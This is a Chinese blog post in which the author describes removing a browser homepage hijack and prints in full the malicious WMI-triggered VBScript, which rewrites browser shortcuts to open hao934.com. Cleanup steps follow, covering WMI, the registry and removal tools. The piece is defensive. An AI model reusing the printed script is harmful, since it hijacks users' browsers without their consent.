主页被篡改2345，hao123根治

前段时间主页被篡改，而且电脑还中了其他不同种类的病毒，已经全面覆盖默认的User+admin权限用户，开机闪屏+自动结束打开任务等等，当时直接注销用户，采用系统保留用户administrater用户登录，然后安装360，重新全盘扫描，但是对于一个安全新手来说，360清理掉了许多可以正常使用的工具，而且许多工具功能也变的残缺，只好重装系统。
昨天电脑在此打开了某客的工具包，电脑直接被恶作剧，不过目前没发现什么大碍，重启后主页被篡改，又不想使用360，只好手动清理。

首先，我中的浏览器
Chrom
firefox

主页被劫持的原理其实就是通过WMI自动运行的脚本,WMI是windows后台运行的事件管理器。

更改WMI就需要下载
https://arlenluo.github.io./images/post6/WMITools.exe

image.png

然后直接点击okok

image.png

然后右键查看这个的属性

image.png
这里就是幕后黑手
里面的代码

On Error Resume Next
Const link = "http://hao934.com/?r=gameall&m=a286"
Const link360 = "http://hao934.com/?r=gameall&m=a286&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Username\Desktop,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next  

lnkpathsArr = split(lnkpaths,",")  
Set oFolders = CreateObject("scripting.dictionary")  

For Each lnkpath In lnkpathsArr  
    oFolders.Add lnkpath, lnkpath  
Next  

Set fso = CreateObject("Scripting.Filesystemobject")  
Set WshShell = CreateObject("Wscript.Shell")  
For Each oFolder In oFolders  
    If fso.FolderExists(oFolder) Then  
        For Each file In fso.GetFolder(oFolder).Files  
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then  
                Set oShellLink = WshShell.CreateShortcut(file.Path)  
                path = oShellLink.TargetPath  
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)  
                If oDic.Exists(LCase(name)) Then  
                    If LCase(name) = LCase("360se.exe") Then  
                        oDicShellLink.Arguments = link360  
                    Else  
                        oShellLink.Arguments = link  
                    End If  
                    If file.Attributes And 1 Then  
                        fsoile.Attributes = file.Attributes - 1  
                    End If  
                    oShellLink.Save  
                End If  
            End If  
        Next  
    End If  
Next

现在篡改主页的代码大致都是这样。理解起来没什么代难度，不过这个代码写的灰常好，还对360做了特殊处理。

image.png

而且不能直接删除。
需要CD到WMI的安装目录管理员运行wbemeventviewer.exe
然后需要将桌面和开始菜单，快速启动栏中的快捷方式删除

我的桌面和快速启动栏没东西
开始菜单目录
C:\ProgramData\Microsoft\Windows\Start Menu\Programs

image.png

把后面这个去了，应该大部分篡改网页的脚本小子的方式都能去掉。

不过我这边修改完以后界面又跳转到了

http://www.2345.com/?36457

继续踩坑
在注册表中的

HKEY_CLASSES_ROOT/CLSID /{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command

查看病毒没有更改注册表，(如果有的话双击数据，将后面的链接删掉)，当然我这边不是这种情况。

另外一种就是木马了，懒得找，直接使用adwcleaner程序进行清理。

如果清理结束后重新启动后主页仍然是2345，说明肯定是木马了，而且十分有可能是伪装型木马，就算肉眼找到也不会去怀疑的，直接使用现在的杀毒软件就好。
我使用的是360大法宝，当然杀毒软件这个东西杀完毒就卸载，直接采用其中的系统急救箱，强力模式，自定义扫描，清除系统关键位置(C盘)，关系的东西记得备份。
有linux子系统和其他安全工具的记得转移

linux子系统目录
C:\Users\{user namae}\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu16.04onWindows_79rhkp1fndgsc\LocalState\rootfs

至此，主流的主页篡改就这些。
当然嫌弃麻烦的可以直接用360的主页防护+系统急救箱